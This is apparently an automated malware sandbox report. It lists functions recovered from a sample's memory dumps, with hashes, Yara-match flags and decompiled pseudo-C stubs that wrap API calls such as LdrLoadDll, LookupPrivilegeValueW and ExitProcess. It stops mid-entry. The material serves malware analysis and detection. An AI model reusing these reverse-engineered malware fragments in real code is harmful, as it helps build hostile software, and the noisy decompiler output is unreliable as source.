                                                                    • Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                    • Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
                                                                    • Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                    • Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                    • Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
                                                                    • Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                    • Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                    • Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
                                                                    • Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                    • Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                    • Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
                                                                    • Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                    • Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                    • Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
                                                                    • Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                    • Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                    • Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
                                                                    • Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                    • Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                    • Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
                                                                    • Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                    • Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                    • Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
                                                                    • Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                    • Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                    • Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
                                                                    • Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                    • Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                    • Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
                                                                    • Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                    • Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                    • Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
                                                                    • Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                    • Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                    • Instruction ID: c3b827b3f31b74d0e0caca9a2511dcdda4f382e711fed3e9a857d7da4aa8c421
                                                                    • Opcode Fuzzy Hash: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                    • Instruction Fuzzy Hash: 1290027131114403D250616984047460409D7D2341F51C431A0814558ED6D59891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                    • Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
                                                                    • Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                    • Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 19%
                                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t11;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				_t11 = E0041A900( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B20(_t11, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				asm("les ebp, [edx]");
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = L00413E30();
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                                    0x0040726f
                                                                    0x00407273
                                                                    0x0040727e
                                                                    0x0040728a
                                                                    0x0040728e
                                                                    0x00407293
                                                                    0x00407297
                                                                    0x0040729a
                                                                    0x0040729c
                                                                    0x0040729d
                                                                    0x0040729e
                                                                    0x004072a3
                                                                    0x004072aa
                                                                    0x004072ad
                                                                    0x004072ba
                                                                    0x004072bc
                                                                    0x004072be
                                                                    0x004072db
                                                                    0x004072db
                                                                    0x00000000
                                                                    0x004072dd
                                                                    0x004072e2

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040723E, Relevance: 1.5, APIs: 1, Instructions: 44threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040723E(void* __eflags) {

				if (__eflags > 0) goto L3;
			}



                                                                    0x0040723f

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: fb77064556b87bca7d5e0ad590ac9f132f0cb4682f298e927716d1a6a997dd92
                                                                    • Instruction ID: 6b54a348dda6a315379af888eb8532495594c9ed149ebdd850dbbf6d663d6814
                                                                    • Opcode Fuzzy Hash: fb77064556b87bca7d5e0ad590ac9f132f0cb4682f298e927716d1a6a997dd92
                                                                    • Instruction Fuzzy Hash: CFF02B72E4021472E72165A16C03FFE73489B40B15F1900AFFE04BA2C1E6A8AD0582EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418503, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 26%
                                                                    			E00418503(void* __ebx, signed int __edx, intOrPtr* __esi, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _t20;
				void* _t32;

				asm("sbb edi, [ecx]");
				asm("cld");
				if(( *(__esi + __edx * 4) & 0x0000009e) < 0) {
					_t20 = _a4;
					_t24 =  *((intOrPtr*)(_t20 + 0xa14));
					_push(__esi);
					_t7 = _t20 + 0xc7c; // 0x8bec97d1
					L00418DC0(_t32, _t20, _t7,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x36);
					ExitProcess(_a8);
				}
				_push(0x47);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				return  *((intOrPtr*)( *__esi))();
			}





                                                                    0x00418503
                                                                    0x00418508
                                                                    0x0041850d
                                                                    0x00418513
                                                                    0x00418516
                                                                    0x0041851c
                                                                    0x00418522
                                                                    0x0041852a
                                                                    0x00418538
                                                                    0x00418538
                                                                    0x0041857b
                                                                    0x00418583
                                                                    0x00418587
                                                                    0x0041858b
                                                                    0x0041858f
                                                                    0x00418592
                                                                    0x00418593
                                                                    0x00418598

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 604c687e5d311aaed13207f03474220bc92aa8e3ebb3fa92d75f1ecd9e261033
                                                                    • Instruction ID: 6b271f584ac64301391852975a153eeaaa294827e28c5fa237393894a509e18a
                                                                    • Opcode Fuzzy Hash: 604c687e5d311aaed13207f03474220bc92aa8e3ebb3fa92d75f1ecd9e261033
                                                                    • Instruction Fuzzy Hash: 7EF04FB52045456FC710DFA8DC80EE777E9EF8D310B14864DF99997251C638E9118BB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004184C2(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t16;
				void* _t23;

				 *(__ecx - 0x6d8813a4) =  *(__ecx - 0x6d8813a4) >> 0xbb;
				 *((char*)(__edx + 0x69)) = 0xd1;
				asm("in al, dx");
				asm("aam 0x55");
				_t13 = _a4;
				_t7 = _t13 + 0xc74; // 0xc74
				L00418DC0(_t23, _a4, _t7,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t16;
			}





                                                                    0x004184c3
                                                                    0x004184ca
                                                                    0x004184ce
                                                                    0x004184cf
                                                                    0x004184d3
                                                                    0x004184df
                                                                    0x004184e7
                                                                    0x004184fd
                                                                    0x00418501

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 0b624a01f69fb3c849e608083e1ef8b3e169b7abcb4b931d6f383f81c1f5be3b
                                                                    • Instruction ID: a857a9b1dbd531ac19179ebd8971d2633dd883d0e1d8e4ba54cee4d2b63b109f
                                                                    • Opcode Fuzzy Hash: 0b624a01f69fb3c849e608083e1ef8b3e169b7abcb4b931d6f383f81c1f5be3b
                                                                    • Instruction Fuzzy Hash: CBF0A0712007056FC715DF68CC48E977B59AF55220F04479CF9685B3D2CA30E811C7E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B14, Relevance: 1.5, APIs: 1, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E00409B14(void* __eax, void* __edx, void* __eflags, intOrPtr _a8) {
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v536;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t33;
				void* _t37;
				void* _t40;
				void* _t41;

				asm("aad 0x5b");
				_t16 = _t33;
				asm("cmc");
				if(__eflags > 0) {
					L8:
					_v12 = _t16;
					__eflags = _t16;
					if(_t16 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t16 = _v12;
					}
					return _t16;
				} else {
					asm("cdq");
					asm("into");
					_t40 = _t37 - 0x214;
					asm("in al, dx");
					asm("adc al, 0x2");
					 *_t16 =  *_t16 + _t16;
					_v8 =  &_v536;
					_t21 = E0041AB50( &_v12, 0x104, _a8);
					_t41 = _t40 + 0xc;
					if(_t21 != 0) {
						_t23 = L0041AF70(__eflags, _v8);
						_t37 = _t41 + 4;
						__eflags = _t23;
						if(_t23 != 0) {
							E0041B1F0( &_v12, 0);
							_t37 = _t37 + 8;
						}
						_t16 = E00419300(_v8);
						goto L8;
					} else {
						return _t21;
					}
				}
			}













                                                                    0x00409b14
                                                                    0x00409b16
                                                                    0x00409b17
                                                                    0x00409b19
                                                                    0x00409b76
                                                                    0x00409b79
                                                                    0x00409b7c
                                                                    0x00409b7e
                                                                    0x00409b92
                                                                    0x00409b94
                                                                    0x00409b94
                                                                    0x00409b9a
                                                                    0x00409b1b
                                                                    0x00409b1b
                                                                    0x00409b1c
                                                                    0x00409b23
                                                                    0x00409b24
                                                                    0x00409b25
                                                                    0x00409b27
                                                                    0x00409b3c
                                                                    0x00409b3f
                                                                    0x00409b44
                                                                    0x00409b49
                                                                    0x00409b53
                                                                    0x00409b58
                                                                    0x00409b5b
                                                                    0x00409b5d
                                                                    0x00409b65
                                                                    0x00409b6a
                                                                    0x00409b6a
                                                                    0x00409b71
                                                                    0x00000000
                                                                    0x00409b4b
                                                                    0x00409b4e
                                                                    0x00409b4e
                                                                    0x00409b49

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 8d64e0f7f356af2dad503ba8f75811b43810361e26f957e5cd70beb05b98a614
                                                                    • Instruction ID: 43a0012a6f7eae0378c1e4c9347adbd3026b3f176c8711a925879de159fa37bb
                                                                    • Opcode Fuzzy Hash: 8d64e0f7f356af2dad503ba8f75811b43810361e26f957e5cd70beb05b98a614
                                                                    • Instruction Fuzzy Hash: FFE04875A4450EAADB00CA89DC41F9EF7F8A744314F009365E828D76C1E670EE45C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                    0x004184df
                                                                    0x004184e7
                                                                    0x004184fd
                                                                    0x00418501

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                    0x004184a7
                                                                    0x004184bd
                                                                    0x004184c1

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                    0x0041864a
                                                                    0x00418660
                                                                    0x00418664

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				_t3 = _t5 + 0xc7c; // 0x8bec97d1
				L00418DC0(_t10, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                    0x00418513
                                                                    0x00418522
                                                                    0x0041852a
                                                                    0x00418538

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
